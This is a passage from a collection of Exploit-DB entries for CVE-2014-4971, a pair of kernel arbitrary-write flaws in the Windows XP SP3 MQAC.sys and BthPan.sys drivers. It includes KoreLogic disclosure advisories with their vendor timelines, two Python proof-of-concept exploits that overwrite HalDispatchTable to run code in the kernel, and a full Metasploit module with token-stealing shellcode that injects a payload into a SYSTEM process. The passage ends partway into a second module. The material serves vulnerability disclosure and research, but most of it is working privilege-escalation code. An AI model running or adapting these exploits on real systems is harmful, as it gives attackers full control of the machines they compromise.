ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246\r\nmqac!AC2QM+0x5d:\r\nb230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=????????\r\n\r\n A write-what-where vulnerability can be leveraged to obtain\r\n escalated privileges. 
To do so, an attacker will need to\r\n allocate memory in userland that is populated with shellcode\r\n designed to find the Token for PID 4 (System) and then overwrite\r\n the token for its own process. By leveraging the vulnerability\r\n in MQAC it is then possible to overwrite the pointer at\r\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\r\n NtQueryIntervalProfile() will subsequently call\r\n HalDispatchTable+0x4, execute our shellcode, and elevate the\r\n privilege of the exploit process.\r\n\r\n4. Mitigation and Remediation Recommendation\r\n\r\n None. A patch is not likely to be forthcoming from the vendor.\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin of KoreLogic\r\n Security, Inc.\r\n\r\n6. Disclosure Timeline\r\n\r\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\r\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\r\n report; states XP is no longer supported and asks if\r\n the vulnerability affects other versions of Windows.\r\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\r\n support policy for XP.\r\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\r\n addressed with patches.\r\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\r\n vulnerability report.\r\n 2014.04.29 - Microsoft opens case to investigate the impact of the\r\n vulnerability on non-XP systems.\r\n 2014.05.06 - Microsoft asks again if this vulnerability affects\r\n non-XP systems.\r\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\r\n report is for XP and other Windows versions have\r\n not been examined.\r\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days\r\n have passed since vendor acknowledgement of the\r\n initial report. KoreLogic requests CVE number for the\r\n vulnerability, if there is one. 
KoreLogic also\r\n requests vendor's public identifier for the\r\n vulnerability along with the expected disclosure date.\r\n 2014.06.11 - Microsoft responds to KoreLogic that the\r\n vulnerability does not affect an \"up-platform\"\r\n product. Says they are investigating embedded\r\n platforms. Does not provide a CVE number or a\r\n disclosure date.\r\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\r\n receipt of the updated PoC. Also requests that\r\n a CVE ID be issued to this vulnerability.\r\n 2014.07.02 - 45 business days have elapsed since Microsoft\r\n acknowledged receipt of the vulnerability report and\r\n PoC.\r\n 2014.07.07 - KoreLogic requests CVE from MITRE.\r\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to\r\n be identical to KL-001-2014-002 and issues\r\n CVE-2014-4971 for both vulnerabilities.\r\n 2014.07.18 - Public disclosure.\r\n\r\n7. Proof of Concept\r\n\r\n #!/usr/bin/python2\r\n #\r\n # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\r\n # Matt Bergin (KoreLogic / Smash the Stack)\r\n # CVE-2014-4971\r\n #\r\n from ctypes import *\r\n from struct import pack\r\n from os import getpid,system\r\n from sys import exit\r\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\r\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\r\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\r\n\r\n # thanks to offsec for the concept\r\n # I re-wrote the code as to not fully insult them :)\r\n def getBase(name=None):\r\n retArray = 
c_ulong*1024\r\n ImageBase = retArray()\r\n callback = c_int(1024)\r\n cbNeeded = c_long()\r\n EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\r\n for base in ImageBase:\r\n driverName = c_char_p(\"\\x00\"*1024)\r\n GetDeviceDriverBaseNameA(base,driverName,48)\r\n if (name):\r\n if (driverName.value.lower() == name):\r\n return base\r\n else:\r\n return (base,driverName.value)\r\n return None\r\n\r\n handle = CreateFileA(\"\\\\\\\\.\\\\MQAC\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\r\n print \"[+] Handle \\\\\\\\.\\\\MQAC @ %s\" % (handle)\r\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\r\n buf = \"\\x50\\x00\\x00\\x00\"+\"\\x90\"*0x400\r\n WriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x5000, \"\\xcc\", 77, byref(c_int(0)))\r\n #Overwrite Pointer\r\n kBase,kVer = getBase()\r\n hKernel = LoadLibraryExA(kVer,0,1)\r\n HalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\")\r\n HalDispatchTable -= hKernel\r\n HalDispatchTable += kBase\r\n HalDispatchTable += 0x4\r\n print \"[+] Kernel @ %s, HalDispatchTable @ %s\" % (hex(kBase),hex(HalDispatchTable))\r\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)\r\n print \"[+] HalDispatchTable+0x4 overwritten\"\r\n CloseHandle(handle)\r\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\r\n exit(0)\r\n\r\nThe contents of this advisory are copyright(c) 2014\r\nKoreLogic, Inc. and are licensed under a Creative Commons\r\nAttribution Share-Alike 4.0 (United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a\r\nproven track record of providing security services to entities\r\nranging from Fortune 500 to small and mid-sized companies. 
We\r\nare a highly skilled team of senior security consultants doing\r\nby-hand security assessments for the most important networks in\r\nthe U.S. and around the world. We are also developers of various\r\ntools and resources aimed at helping the security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34112/"}, {"lastseen": "2016-02-03T20:33:38", "description": "Microsoft Windows XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation. CVE-2014-4971. Local exploit for windows platform", "published": "2014-07-21T00:00:00", "type": "exploitdb", "title": "Microsoft Windows XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-21T00:00:00", "id": "EDB-ID:34131", "href": "https://www.exploit-db.com/exploits/34131/", "sourceData": "\"\"\"\r\nTitle: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\r\nAdvisory ID: KL-001-2014-002\r\nPublication Date: 2014-07-18\r\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt\r\n\r\n\r\n1. Vulnerability Details\r\n\r\n Affected Vendor: Microsoft\r\n Affected Product: Bluetooth Personal Area Networking\r\n Affected Versions: 5.1.2600.5512\r\n Platform: Microsoft Windows XP SP3\r\n CWE Classification: CWE-123: Write-what-where Condition\r\n Impact: Privilege Escalation\r\n Attack vector: IOCTL\r\n CVE ID: CVE-2014-4971\r\n\r\n2. Vulnerability Description\r\n\r\n A vulnerability within the BthPan module allows an attacker to\r\n inject memory they control into an arbitrary location they\r\n define. 
This can be used by an attacker to overwrite\r\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\r\n calling NtQueryIntervalProfile.\r\n\r\n3. Technical Description\r\n\r\n A userland process can create a handle into the BthPan device\r\n and subsequently make DeviceIoControlFile() calls into that\r\n device. During the IRP handler routine for 0x0012b814 the user\r\n provided OutputBuffer address is not validated. This allows an\r\n attacker to specify an arbitrary address and write\r\n (or overwrite) the memory residing at the specified address.\r\n This is classicaly known as a write-what-where vulnerability and\r\n has well known exploitation methods associated with it.\r\n\r\n A stack trace from our fuzzing can be seen below. In our fuzzing\r\n testcase, the specified OutputBuffer in the DeviceIoControlFile()\r\n call is 0xffff0000.\r\n\r\nSTACK_TEXT:\r\nb1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\r\nb1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\r\nb1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\r\nb1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92\r\nb1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3\r\nb1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8\r\nb1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25\r\nb1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b\r\nb1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21\r\nb1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b\r\nb1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8\r\nb1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93\r\nb1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48\r\nb1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c\r\nb1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 
nt!IopfCallDriver+0x31\r\nb1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70\r\nb1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7\r\nb1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\nWARNING: Stack unwind information not available. Following frames may be wrong.\r\n\r\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\r\n command shows the fault originating in the bthpan driver.\r\n\r\nFOLLOWUP_IP:\r\nbthpan!BthpanReqAdd+16b\r\nb272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565)\r\n\r\n Reviewing the TRAP_FRAME at the time of crash we can see\r\n IopCompleteRequest() copying data from InputBuffer into the\r\n OutputBuffer. InputBuffer is another parameter provided to the\r\n DeviceIoControlFile() function and is therefore controllable by\r\n the attacker. The edi register contains the invalid address\r\n provided during the fuzz testcase.\r\n\r\nTRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630)\r\nErrCode = 00000002\r\neax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000\r\neip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203\r\nnt!IopCompleteRequest+0x92:\r\n804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]\r\n\r\n A write-what-where vulnerability can be leveraged to obtain\r\n escalated privileges. To do so, an attacker will need to\r\n allocate memory in userland that is populated with shellcode\r\n designed to find the Token for PID 4 (System) and then overwrite\r\n the token for its own process. By leveraging the vulnerability\r\n in BthPan it is then possible to overwrite the pointer at\r\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\r\n NtQueryIntervalProfile() will subsequently call\r\n HalDispatchTable+0x4, execute our shellcode, and elevate the\r\n privilege of the exploit process.\r\n\r\n4. 
Mitigation and Remediation Recommendation\r\n\r\n None. A patch is not likely to be forthcoming from the vendor.\r\n\r\n5. Credit\r\n\r\n This vulnerability was discovered by Matt Bergin of KoreLogic\r\n Security, Inc.\r\n\r\n6. Disclosure Timeline\r\n\r\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\r\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\r\n report; states XP is no longer supported and asks if\r\n the vulnerability affects other versions of Windows.\r\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\r\n support policy for XP.\r\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\r\n addressed with patches.\r\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\r\n vulnerability report.\r\n 2014.04.29 - Microsoft opens case to investigate the impact of the\r\n vulnerability on non-XP systems.\r\n 2014.05.06 - Microsoft asks again if this vulnerability affects\r\n non-XP systems.\r\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\r\n report is for XP and other Windows versions have not\r\n been examined.\r\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days have\r\n passed since vendor acknowledgement of the initial\r\n report. KoreLogic requests CVE number for the\r\n vulnerability, if there is one. KoreLogic also\r\n requests vendor's public identifier for the\r\n vulnerability along with the expected disclosure date.\r\n 2014.06.11 - Microsoft informs KoreLogic that the vulnerability\r\n does not impact any \"up-platform\" products. Says they\r\n are investigating embedded platforms. 
Does not provide\r\n CVE number.\r\n 2014.06.24 - Microsoft contacts KoreLogic to say that they confused\r\n the report of this vulnerability with another and that\r\n they cannot reproduce the described behavior.\r\n Microsoft asks for an updated Proof-of-Concept, crash\r\n dumps or any further analysis of the vulnerability\r\n that KoreLogic can provide.\r\n 2014.06.25 - KoreLogic provides Microsoft with an updated\r\n Proof-of-Concept which demonstrates using the\r\n vulnerability to spawn a system shell.\r\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\r\n receipt of the updated PoC. Also requests that a CVE\r\n ID be issued for this vulnerability.\r\n 2014.07.02 - 45 business days have elapsed since Microsoft\r\n acknowledged receipt of the vulnerability report and\r\n PoC.\r\n 2014.07.07 - KoreLogic requests CVE from MITRE.\r\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be\r\n identical to KL-001-2014-003 and issues CVE-2014-4971\r\n for both vulnerabilities.\r\n 2014.07.18 - Public disclosure.\r\n\r\n7. 
Proof of Concept\r\n\"\"\"\r\n\r\n#!/usr/bin/python2\r\n#\r\n# KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\r\n# Matt Bergin (KoreLogic / Smash the Stack) \r\n# CVE-2014-4971\r\n#\r\nfrom ctypes import *\r\nfrom struct import pack\r\nfrom os import getpid,system\r\nfrom sys import exit\r\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\r\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\r\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\r\n \r\n # thanks to offsec for the concept\r\n # I re-wrote the code as to not fully insult them \r\n def getBase(name=None):\r\n \tretArray = c_ulong*1024\r\n \tImageBase = retArray()\r\n \tcallback = c_int(1024)\r\n \tcbNeeded = c_long()\r\n \tEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\r\n \tfor base in ImageBase:\r\n \t\tdriverName = c_char_p(\"\\x00\"*1024)\r\n \t\tGetDeviceDriverBaseNameA(base,driverName,48)\r\n \t\tif (name):\r\n \t\t\tif (driverName.value.lower() == name):\r\n \t\t\t\treturn base\r\n \t\telse:\r\n \t\t\treturn (base,driverName.value)\r\n \treturn None\r\n \r\n handle = CreateFileA(\"\\\\\\\\.\\\\BthPan\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\r\n if (handle == INVALID_HANDLE_VALUE):\r\n\tprint \"[!] 
Could not open handle to BthPan\"\r\n\texit(1)\r\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\r\n buf = \"\\xcc\\xcc\\xcc\\xcc\"+\"\\x90\"*0x400\r\n WriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0)))\r\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\r\n kBase,kVer = getBase()\r\n hKernel = LoadLibraryExA(kVer,0,1)\r\n HalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\")\r\n HalDispatchTable -= hKernel\r\n HalDispatchTable += kBase\r\n HalDispatchTable += 0x4\r\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)\r\n CloseHandle(handle)\r\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\r\n exit(0)\r\n\r\n\"\"\"\r\nThe contents of this advisory are copyright(c) 2014 KoreLogic, Inc.\r\nand are licensed under a Creative Commons Attribution Share-Alike 4.0\r\n(United States) License:\r\nhttp://creativecommons.org/licenses/by-sa/4.0/\r\n\r\nKoreLogic, Inc. is a founder-owned and operated company with a proven\r\ntrack record of providing security services to entities ranging from\r\nFortune 500 to small and mid-sized companies. We are a highly skilled\r\nteam of senior security consultants doing by-hand security assessments\r\nfor the most important networks in the U.S. and around the world. We\r\nare also developers of various tools and resources aimed at helping\r\nthe security community.\r\nhttps://www.korelogic.com/about-korelogic.html\r\n\r\nOur public vulnerability disclosure policy is available at:\r\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt\r\n\"\"\"", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34131/"}, {"lastseen": "2016-02-03T20:38:00", "description": "MQAC.sys Arbitrary Write Privilege Escalation. CVE-2014-4971. 
Local exploit for win32 platform", "published": "2014-07-25T00:00:00", "type": "exploitdb", "title": "MQAC.sys Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-25T00:00:00", "id": "EDB-ID:34167", "href": "https://www.exploit-db.com/exploits/34167/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = AverageRanking\r\n\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n\r\n def initialize(info={})\r\n super(update_info(info, {\r\n 'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation',\r\n 'Description' => %q{\r\n A vulnerability within the MQAC.sys module allows an attacker to\r\n overwrite an arbitrary location in kernel memory.\r\n\r\n This module will elevate itself to SYSTEM, then inject the payload\r\n into another SYSTEM process.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Matt Bergin', # original exploit and all the hard work\r\n 'Spencer McIntyre' # MSF module\r\n ],\r\n 'Arch' => [ ARCH_X86 ],\r\n 'Platform' => [ 'win' ],\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'thread',\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP SP3',\r\n {\r\n '_KPROCESS' => \"\\x44\",\r\n '_TOKEN' => \"\\xc8\",\r\n '_UPID' => \"\\x84\",\r\n '_APLINKS' => \"\\x88\"\r\n }\r\n ],\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-4971' ],\r\n [ 'EDB', '34112' ],\r\n [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ]\r\n ],\r\n 'DisclosureDate'=> 'Jul 22 2014',\r\n 'DefaultTarget' => 0\r\n }))\r\n end\r\n\r\n def find_sys_base(drvname)\r\n session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')\r\n session.railgun.add_function('psapi', 
'EnumDeviceDrivers', 'BOOL', [ [\"PBLOB\", \"lpImageBase\", \"out\"], [\"DWORD\", \"cb\", \"in\"], [\"PDWORD\", \"lpcbNeeded\", \"out\"]])\r\n session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ [\"LPVOID\", \"ImageBase\", \"in\"], [\"PBLOB\", \"lpBaseName\", \"out\"], [\"DWORD\", \"nSize\", \"in\"]])\r\n results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)\r\n addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack(\"L*\")\r\n\r\n addresses.each do |address|\r\n results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)\r\n current_drvname = results['lpBaseName'][0..results['return'] - 1]\r\n if drvname == nil\r\n if current_drvname.downcase.include?('krnl')\r\n return [address, current_drvname]\r\n end\r\n elsif drvname == results['lpBaseName'][0..results['return'] - 1]\r\n return [address, current_drvname]\r\n end\r\n end\r\n end\r\n\r\n # Function borrowed from smart_hashdump\r\n def get_system_proc\r\n # Make sure you got the correct SYSTEM Account Name no matter the OS Language\r\n local_sys = resolve_sid(\"S-1-5-18\")\r\n system_account_name = \"#{local_sys[:domain]}\\\\#{local_sys[:name]}\"\r\n\r\n this_pid = session.sys.process.getpid\r\n # Processes that can Blue Screen a host if migrated in to\r\n dangerous_processes = [\"lsass.exe\", \"csrss.exe\", \"smss.exe\"]\r\n session.sys.process.processes.each do |p|\r\n # Check we are not migrating to a process that can BSOD the host\r\n next if dangerous_processes.include?(p[\"name\"])\r\n next if p[\"pid\"] == this_pid\r\n next if p[\"pid\"] == 4\r\n next if p[\"user\"] != system_account_name\r\n return p\r\n end\r\n end\r\n\r\n def open_device\r\n handle = session.railgun.kernel32.CreateFileA(\"\\\\\\\\.\\\\MQAC\", \"FILE_SHARE_WRITE|FILE_SHARE_READ\", 0, nil, \"OPEN_EXISTING\", 0, nil)\r\n if handle['return'] == 0\r\n print_error('Failed to open the \\\\\\\\.\\\\MQAC device')\r\n return nil\r\n end\r\n handle = handle['return']\r\n 
end\r\n\r\n def check\r\n handle = open_device\r\n if handle.nil?\r\n return Exploit::CheckCode::Safe\r\n end\r\n session.railgun.kernel32.CloseHandle(handle)\r\n\r\n os = sysinfo[\"OS\"]\r\n case os\r\n when /windows xp.*service pack 3/i\r\n return Exploit::CheckCode::Appears\r\n when /windows xp/i\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n if sysinfo[\"Architecture\"] =~ /wow64/i\r\n print_error(\"Running against WOW64 is not supported\")\r\n return\r\n elsif sysinfo[\"Architecture\"] =~ /x64/\r\n print_error(\"Running against 64-bit systems is not supported\")\r\n return\r\n end\r\n\r\n if is_system?\r\n print_error(\"This meterpreter session is already running as SYSTEM\")\r\n return\r\n end\r\n\r\n kernel_info = find_sys_base(nil)\r\n base_addr = 0xffff\r\n print_status(\"Kernel Base Address: 0x#{kernel_info[0].to_s(16)}\")\r\n\r\n handle = open_device\r\n return if handle.nil?\r\n\r\n this_proc = session.sys.process.open\r\n unless this_proc.memory.writable?(base_addr)\r\n session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack(\"L\"), nil, [ 0xffff ].pack(\"L\"), \"MEM_COMMIT|MEM_RESERVE\", \"PAGE_EXECUTE_READWRITE\")\r\n end\r\n unless this_proc.memory.writable?(base_addr)\r\n print_error('Failed to properly allocate memory')\r\n this_proc.close\r\n return\r\n end\r\n\r\n hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)\r\n hKernel = hKernel['return']\r\n halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, \"HalDispatchTable\")\r\n halDispatchTable = halDispatchTable['return']\r\n halDispatchTable -= hKernel\r\n halDispatchTable += kernel_info[0]\r\n print_status(\"HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}\")\r\n\r\n tokenstealing = \"\\x52\" # push edx # Save edx on the stack\r\n tokenstealing << \"\\x53\" # push ebx # Save ebx on the stack\r\n tokenstealing << \"\\x33\\xc0\" # xor eax, eax # eax = 0\r\n tokenstealing 
<< \"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD\r\n tokenstealing << \"\\x8b\\x40\" + target['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS\r\n tokenstealing << \"\\x8b\\xc8\" # mov ecx, eax\r\n tokenstealing << \"\\x8b\\x98\" + target['_TOKEN'] + \"\\x00\\x00\\x00\" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN\r\n tokenstealing << \"\\x8b\\x80\" + target['_APLINKS'] + \"\\x00\\x00\\x00\" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks\r\n tokenstealing << \"\\x81\\xe8\" + target['_APLINKS'] + \"\\x00\\x00\\x00\" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks\r\n tokenstealing << \"\\x81\\xb8\" + target['_UPID'] + \"\\x00\\x00\\x00\\x04\\x00\\x00\\x00\" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)\r\n tokenstealing << \"\\x75\\xe8\" # jne 0000101e ======================\r\n tokenstealing << \"\\x8b\\x90\" + target['_TOKEN'] + \"\\x00\\x00\\x00\" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX\r\n tokenstealing << \"\\x8b\\xc1\" # mov eax, ecx # Retrieves KPROCESS stored on ECX\r\n tokenstealing << \"\\x89\\x90\" + target['_TOKEN'] + \"\\x00\\x00\\x00\" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS\r\n tokenstealing << \"\\x5b\" # pop ebx # Restores ebx\r\n tokenstealing << \"\\x5a\" # pop edx # Restores edx\r\n tokenstealing << \"\\xc2\\x10\" # ret 10h # Away from the kernel!\r\n\r\n shellcode = make_nops(0x200) + tokenstealing\r\n this_proc.memory.write(0x1, shellcode)\r\n this_proc.close\r\n\r\n print_status(\"Triggering vulnerable IOCTL\")\r\n session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)\r\n result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)\r\n\r\n unless is_system?\r\n print_error(\"Exploit failed\")\r\n return\r\n end\r\n\r\n proc = 
get_system_proc\r\n print_status(\"Injecting the payload into SYSTEM process: #{proc['name']}\")\r\n unless execute_shellcode(payload.encoded, nil, proc['pid'])\r\n fail_with(Failure::Unknown, \"Error while executing the payload\")\r\n end\r\n end\r\n\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34167/"}, {"lastseen": "2016-02-04T00:20:53", "description": "Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation. CVE-2014-4971. Local exploit for win32 platform", "published": "2014-10-15T00:00:00", "type": "exploitdb", "title": "Microsoft Bluetooth Personal Area Networking - BthPan.sys Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-10-15T00:00:00", "id": "EDB-ID:34982", "href": "https://www.exploit-db.com/exploits/34982/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'msf/core/exploit/local/windows_kernel'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = AverageRanking\r\n\r\n include Msf::Exploit::Local::WindowsKernel\r\n include Msf::Post::File\r\n include Msf::Post::Windows::FileInfo\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',\r\n 'Description' => %q{\r\n A vulnerability within Microsoft Bluetooth Personal Area Networking module,\r\n BthPan.sys, can allow an attacker to inject memory controlled by the attacker\r\n into an arbitrary location. 
